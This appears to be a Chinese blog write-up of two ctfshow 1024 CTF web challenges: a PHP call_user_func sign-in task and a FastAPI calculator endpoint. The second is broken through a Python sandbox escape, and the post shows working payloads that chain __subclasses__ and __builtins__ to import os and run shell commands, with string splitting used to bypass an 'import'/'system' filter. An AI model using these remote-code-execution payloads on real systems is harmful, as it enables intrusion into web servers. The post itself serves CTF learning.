• 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏吧

ctfshow 1024杯 部分web题解

开发技术 开发技术 1个月前 (10-27) 35次浏览

————恢复内容开始————

  今年1024忙得厉害,去大上海参加geekpwn膜拜大佬,几家平台的题目没怎么好好看。特别是小破站的比赛拉跨的一批,bytectf的web到了第二天晚上所有题的题解加在一起还没有10解直接劝退(yuligeyyds!!!)。第回南京之后做了两道1024的题目,难度偏简单,在此记录一下。

  1.1024_WEB签到

  开题得源码

  

 1 <?php
 2 
 3 /*
 4 # -*- coding: utf-8 -*-
 5 # @Author: h1xa
 6 # @Date:   2020-10-20 23:59:00
 7 # @Last Modified by:   h1xa
 8 # @Last Modified time: 2020-10-21 03:51:36
 9 # @email: h1xa@ctfer.com
10 # @link: https://ctfer.com
11 
12 */
13 
14 error_reporting(0);
15 highlight_file(__FILE__);
16 call_user_func($_GET['f']);

  看到危险函数call_user_func($_GET[‘f’]);  第一反应应该是上传一句话木马getshell,但是这里只传入了一个参数进行执行,还以为是什么奇技淫巧,本地开了一个环境去测试。因为我在ubuntu的php环境是php5,所以在本地使用?f=assert(phpinfo())的时候确实是成功了,但是拿到题目环境里面插入一句话木马一直没能成功,才反应过来是php版本问题。

  传统的call_user_func 使用方法是call_user_func($func,$value),前面的是要执行的函数名字,后面是传入函数的参数值。一般来说$func传入的是assert,$value传入我们要执行的代码以达到rce的目的(在call_user_func中不能使用eval)。

  本题因为只有一个传入参数,并且传入的默认为是$value,所以我们先传入phpinfo试试,结果成功得到界面。

ctfshow 1024杯 部分web题解

  通过查看phpinfo的信息我们直接发现了一个可执行的函数:

ctfshow 1024杯 部分web题解

  传入f=ctfshow_1024执行函数得到flag,简单粗暴。

  flag{welcome_2_ctfshow_1024_cup}

 

2.1024_fastapi

  打开题目得到的是一个json数据,看了一眼题目fastapi,百度告诉我们FastAPI是基于python3.6+和标准python类型的一个现代化的,快速的(高性能),构建api的web框架。

  • Fast: 非常高的性能,媲美nodejs和go。可用的最快的Python框架之一.
  • Fast to Code 增加了200%~300%开发功能的速度
  • Fewer Buys 减少了40%的人为开发错误
  • Intuitive 伟大的编辑支持。减少了debug时间。
  • Easy 简单的使用和学习设计,减少了阅读文档的时间。
  • Short 减少代码重复,每个参数声明的多个特性,更少的错误。
  • Robust 获得生产就绪代码。自动交互文档
  • Standards-based 基于开放的标准API: OpenAPI和JSON Schema

  是python框架啊,那没事了,盲猜ssti。挂一个万能ssti文章:https://www.anquanke.com/post/id/188172。

  稍微了解了一下fastapi得知它具有方便的api文档/redoc和/docs 在本题中我们尝试打开得到如下界面:

ctfshow 1024杯 部分web题解

  看到此站点下还有一个/cccalccc页面,内容是一个计算器的实现,传入参数q应该是一个可以执行的计算式,显然我们的注入点就在这个q上面。几次测试之后发现{payload}能够实现注入,但是发现结果为list或string类型的都Internal Server Error或结果为空,尝试将string切片显示,发现成功出现回显。编写jio本康康有什么可以利用的模块:

 

1 import requests
2 
3 url='http://4cfb3ea5-9890-4c75-a6ef-9e64bfa8abc5.chall.ctf.show/cccalccc'
4 for i in range(500):
5     data={'q':'str([].__class__.__base__.__subclasses__()['+str(i)+'])[1:]'}
6     r=requests.post(url,data)
7     print(i        ,r.text)

 

本题的环境是python3,所以利用方式要比python2中file模块的调用复杂多了。主要是利用__builtins__中的函数进行文件读取利用等等,而含有__builtins__的内建函数有这些:

(59, <class 'warnings.WarningMessage'>, '__builtins__')
(60, <class 'warnings.catch_warnings'>, '__builtins__')
(61, <class '_weakrefset._IterationGuard'>, '__builtins__')
(62, <class '_weakrefset.WeakSet'>, '__builtins__')
(72, <class 'site._Printer'>, '__builtins__')
(77, <class 'site.Quitter'>, '__builtins__')
(78, <class 'codecs.IncrementalEncoder'>, '__builtins__')
(79, <class 'codecs.IncrementalDecoder'>, '__builtins__')

 

可以利用的内建函数还有os和linechache等,具体情况具体分析,多看看上面给出的那篇参考文章。

  刚刚脚本跑出来的内建函数中发现了188.warnings.WarningMessage和189warnings.catch_warnings,可以进行利用

ctfshow 1024杯 部分web题解  尝试列出当前目录下的所有文件

  

1 import requests
2 
3 url = 'http://4cfb3ea5-9890-4c75-a6ef-9e64bfa8abc5.chall.ctf.show/cccalccc'
4 payload = '{str([].__class__.__base__.__subclasses__()[188].__init__.__globals__['__builtins__']['__import__']('os').system('ls'))[1:]}'
5 data = {'q':payload}
6 r = requests.post(url,data)
7 print(r.text)

//{"res":"hack out!","err":false}

 

 

  发现过滤了system和import,import尝试使用im+port进行绕过,system使用popen代替,结尾要使用.read(),不然没有回显。

  关于popen:

用法:os.popen(command[,mode[,bufsize]])

说明:mode – 模式权限可以是 ‘r’(默认) 或 ‘w’。

popen方法通过p.read()获取终端输出,而且popen需要关闭close().当执行成功时,close()不返回任何值,失败时,close()返回系统返回值(失败返回1). 可见它获取返回值的方式和os.system不同。

  把payload改成

payload = '{str([].__class__.__base__.__subclasses__()[189].__init__.__globals__['__builtins__']['__imp'+'ort__']('os').__dict__['pop'+'en']('ls').read())[1:]}'

  成功读取到当前的文件列表:{“res”:[“ain.pynstart.shn”],”err”:false}
  因为我们使用的是切片回显,所以第一个文件应该是main.py,m被切掉了。我们尝试去读取main.py的内容,结果如下:

ctfshow 1024杯 部分web题解

  找到提示告诉我们flag在/mnt/f1a9里面,直接读取获得flag:

  flag{ea066230-29c9-4cbb-b1b9-2e8b4edf4abf}


喜欢 (0)